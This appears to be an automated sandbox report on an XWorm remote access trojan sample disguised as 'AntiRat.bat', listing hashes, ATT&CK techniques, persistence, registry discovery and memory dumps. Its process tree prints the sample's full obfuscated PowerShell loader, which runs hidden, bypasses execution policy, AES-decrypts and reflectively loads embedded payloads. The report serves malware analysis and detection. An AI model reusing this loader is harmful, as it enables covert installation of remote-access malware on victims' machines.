xworm | 9478888ccb2e5bc3d4186efff2f45058783d2ef5aa25e351efb2448610388176

General

Target

AntiRat.bat
Size

287KB
MD5

ed4aa7fdb67238c14fa9d266916e6eb3
SHA1

8df2185beef7c7a170bd53921effb4d9ff5d791a
SHA256

9478888ccb2e5bc3d4186efff2f45058783d2ef5aa25e351efb2448610388176
SHA512

97858e4ae2895213c3f140afe48ffd8e0682bdd28f64614896a1009476a2347138b780564fea969881182632c9e715d7af2c4ac1ac397c9d08ed69c7d044e5d7
SSDEEP

6144:afbEDtzm7hg0cIuKH5qGxXl4Vk6YupoHOzNW2TkJaiyIpQP:azE6pLHVx1k7oHqWHyICP

Score

10^/10

Malware Config

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1532-16-0x000001CBDFD90000-0x000001CBDFDA6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 21 IoCs

flow	pid	Process
19	1532	powershell.exe
22	1532	powershell.exe
24	1532	powershell.exe
27	1532	powershell.exe
33	1532	powershell.exe
34	1532	powershell.exe
35	1532	powershell.exe
37	1532	powershell.exe
38	1532	powershell.exe
39	1532	powershell.exe
40	1532	powershell.exe
41	1532	powershell.exe
42	1532	powershell.exe
43	1532	powershell.exe
44	1532	powershell.exe
45	1532	powershell.exe
46	1532	powershell.exe
55	1532	powershell.exe
58	1532	powershell.exe
59	1532	powershell.exe
60	1532	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1532	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1581648047-808845429-2272123689-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\ProgramData\\powershell.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	powershell.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1532	powershell.exe
1532	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1444 wrote to memory of 1532	1444	cmd.exe	85
PID 1444 wrote to memory of 1532	1444	cmd.exe	85

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\AntiRat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLHfII79cFXLOPa0He7bvB+XJKUt4rUms5FR0yeN8C8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sOj8a66XAQqml/CBJ6HP3g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FJGpA=New-Object System.IO.MemoryStream(,$param_var); $YjNQm=New-Object System.IO.MemoryStream; $sQOdI=New-Object System.IO.Compression.GZipStream($FJGpA, [IO.Compression.CompressionMode]::Decompress); $sQOdI.CopyTo($YjNQm); $sQOdI.Dispose(); $FJGpA.Dispose(); $YjNQm.Dispose(); $YjNQm.ToArray();}function execute_function($param_var,$param2_var){ $JyGZB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $nnvmF=$JyGZB.EntryPoint; $nnvmF.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\AntiRat.bat';$kQiVF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\AntiRat.bat').Split([Environment]::NewLine);foreach ($KHvsD in $kQiVF) { if ($KHvsD.StartsWith(':: ')) { $OGGPu=$KHvsD.Substring(3); break; }}$payloads_var=[string[]]$OGGPu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Adds Run key to start application
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_20qwuspg.5z2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1532-14-0x000001CBC7C20000-0x000001CBC7C28000-memory.dmp

Filesize
32KB

Download
memory/1532-1-0x000001CBDFCB0000-0x000001CBDFCD2000-memory.dmp

Filesize
136KB

Download
memory/1532-11-0x00007FFB870F0000-0x00007FFB87BB2000-memory.dmp

Filesize
10.8MB

Download
memory/1532-12-0x00007FFB870F0000-0x00007FFB87BB2000-memory.dmp

Filesize
10.8MB

Download
memory/1532-13-0x00007FFB870F0000-0x00007FFB87BB2000-memory.dmp

Filesize
10.8MB

Download
memory/1532-0-0x00007FFB870F3000-0x00007FFB870F5000-memory.dmp

Filesize
8KB

Download
memory/1532-15-0x000001CBDFD40000-0x000001CBDFD78000-memory.dmp

Filesize
224KB

Download
memory/1532-16-0x000001CBDFD90000-0x000001CBDFDA6000-memory.dmp

Filesize
88KB

Download
memory/1532-23-0x00007FFB870F3000-0x00007FFB870F5000-memory.dmp

Filesize
8KB

Download
memory/1532-24-0x00007FFB870F0000-0x00007FFB87BB2000-memory.dmp

Filesize
10.8MB

Download
memory/1532-25-0x000001CBE0AB0000-0x000001CBE0ABC000-memory.dmp

Filesize
48KB

Download
memory/1532-26-0x000001CBE1B90000-0x000001CBE20B8000-memory.dmp

Filesize
5.2MB

Download
memory/1532-27-0x000001CBC7C10000-0x000001CBC7C1C000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads